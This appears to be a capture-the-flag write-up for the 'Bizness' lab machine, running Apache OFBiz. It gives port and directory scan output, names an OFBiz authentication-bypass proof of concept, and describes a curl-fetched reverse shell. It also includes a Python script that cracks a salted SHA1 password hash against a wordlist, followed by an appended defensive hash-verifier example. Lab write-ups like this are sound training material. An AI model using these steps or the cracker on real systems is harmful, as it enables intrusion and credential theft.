Bizness
#ofbiz IP: 10.10.11.252
Port Scan
sudo nmap --min-rate 1000 -p- -T4 -sV 10.10.11.252 -oG full_scan
[sudo] password for parallels:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-05 18:25 -03
Warning: 10.10.11.252 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.252 (10.10.11.252)
Host is up (0.13s latency).
Not shown: 65290 closed tcp ports (reset), 241 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0
38755/tcp open tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.75 seconds
Dir Scanner
dirsearch -u https://bizness.htb/ -e php,jsp,asp,aspx,js,md,bak,yaml,yml,toml,zip
Extensions: php, jsp, asp, aspx, js, md, bak, yaml, yml, toml, zip | HTTP method: GET | Threads: 25 | Wordlist size: 14668
Output File: /home/parallels/reports/https_bizness.htb/__24-02-05_18-35-33.txt
Target: https://bizness.htb/
[18:35:33] Starting:
[18:35:50] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:35:51] 400 - 795B - /a%5c.aspx
[18:35:53] 302 - 0B - /accounting -> https://bizness.htb/accounting/
[18:36:22] 302 - 0B - /catalog -> https://bizness.htb/catalog/
[18:36:24] 302 - 0B - /common -> https://bizness.htb/common/
[18:36:24] 404 - 762B - /common/
[18:36:24] 404 - 780B - /common/config/api.ini
[18:36:24] 404 - 779B - /common/config/db.ini
[18:36:26] 302 - 0B - /content -> https://bizness.htb/content/
[18:36:26] 302 - 0B - /content/debug.log -> https://bizness.htb/content/control/main
[18:36:26] 302 - 0B - /content/ -> https://bizness.htb/content/control/main
[18:36:28] 200 - 34KB - /control/
[18:36:28] 200 - 34KB - /control
[18:36:29] 404 - 741B - /default.jsp
[18:36:29] 200 - 11KB - /control/login
[18:36:33] 302 - 0B - /error -> https://bizness.htb/error/
[18:36:33] 404 - 761B - /error/
[18:36:33] 404 - 770B - /error/error.log
[18:36:33] 302 - 0B - /example -> https://bizness.htb/example/
[18:36:40] 404 - 769B - /images/Sym.php
[18:36:40] 404 - 762B - /images/
[18:36:40] 302 - 0B - /images -> https://bizness.htb/images/
[18:36:40] 404 - 768B - /images/README
[18:36:40] 404 - 769B - /images/c99.php
[18:36:42] 302 - 0B - /index.jsp -> https://bizness.htb/control/main
Web Content
- Apache OFBiz exploit
Verify the exploit path
Testing the exploit path
- The PoC works
Path to remote code execution
- Using the following repo: https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
Getting the reverse shell
- Serving a file with a bash one-liner payload and fetching its contents with curl
user.txt
Path to root
Finding the user file with the SHA1 hash
Files that contain references to salt data
- File with salt data
- Python script to crack the hash
    import hashlib
    import base64
    import os


    class TextToHash:
        """Re-implements the OFBiz password hashing layout: digest(salt || value),
        rendered as "$ALG$salt$base64url(digest)"."""

        def __init__(self, hash_type="SHA256", pbkdf2_iterations=10000):
            self.hash_type = hash_type
            self.pbkdf2_iterations = pbkdf2_iterations  # kept for parity with OFBiz, unused here

        def crypt_bytes(self, salt, value):
            # OFBiz generates a random salt when none is supplied
            if not salt:
                salt = base64.urlsafe_b64encode(os.urandom(16)).decode('utf-8')
            hashed = self.get_crypted_bytes(salt, value)
            return f"${self.hash_type}${salt}${hashed}"

        def get_crypted_bytes(self, salt, value):
            try:
                hash_obj = hashlib.new(self.hash_type)
            except ValueError as e:  # hashlib raises ValueError for an unknown algorithm name
                raise Exception(f"There is an error happened with {self.hash_type}: {e}")
            hash_obj.update(salt.encode('utf-8'))
            hash_obj.update(value)
            hashed_bytes = hash_obj.digest()
            # the urlsafe alphabet contains no '+', so the replace is a no-op kept from the original
            return base64.urlsafe_b64encode(hashed_bytes).decode('utf-8').replace('+', '')


    hash_t = "SHA1"
    salt = "d"
    target_hash = "$SHA1$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I="
    wordlist = '/usr/wordlist/rockyou.txt'

    encryptor = TextToHash(hash_t)
    with open(wordlist, 'r', encoding='latin-1') as password_list:
        for password in password_list:
            value = password.strip()
            hashed_password = encryptor.crypt_bytes(salt, value.encode('utf-8'))
            if hashed_password == target_hash:
                print(f"[+] Password: {value}, hash: {hashed_password}")
                break
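As an added example (not part of the writeup), a small verifier for the OFBiz-style `$ALG$salt$hash` strings the script above targets: it parses the stored value, recomputes digest(salt || candidate) the same way, rejects malformed records, and compares in constant time. The function names and the sample password are my own assumptions.

```python
import base64
import hashlib
import hmac


def ofbiz_hash(algorithm, salt, password):
    """Build "$ALG$salt$base64url(digest(salt || password))", the layout
    seen in the stored hash above (e.g. "$SHA1$d$...")."""
    h = hashlib.new(algorithm.lower())
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    digest_b64 = base64.urlsafe_b64encode(h.digest()).decode("ascii")
    return f"${algorithm}${salt}${digest_b64}"


def parse_ofbiz_hash(stored):
    """Split a stored "$ALG$salt$hash" string into (algorithm, salt, hash).

    Raises ValueError for anything without exactly that shape, so a
    malformed or unsalted record is rejected instead of being compared
    against an empty salt by accident."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "" or not all(parts[1:]):
        raise ValueError(f"not an OFBiz-style hash: {stored!r}")
    return parts[1], parts[2], parts[3]


def verify_ofbiz_hash(stored, candidate):
    """Return True when candidate reproduces the stored digest."""
    algorithm, salt, digest_b64 = parse_ofbiz_hash(stored)
    expected = ofbiz_hash(algorithm, salt, candidate).rsplit("$", 1)[1]
    # constant-time comparison: does not leak how many leading chars matched
    return hmac.compare_digest(expected, digest_b64)


if __name__ == "__main__":
    # constructed sample record, not a credential from the box
    record = ofbiz_hash("SHA1", "d", "constructed-password")
    print(record, verify_ofbiz_hash(record, "constructed-password"))
```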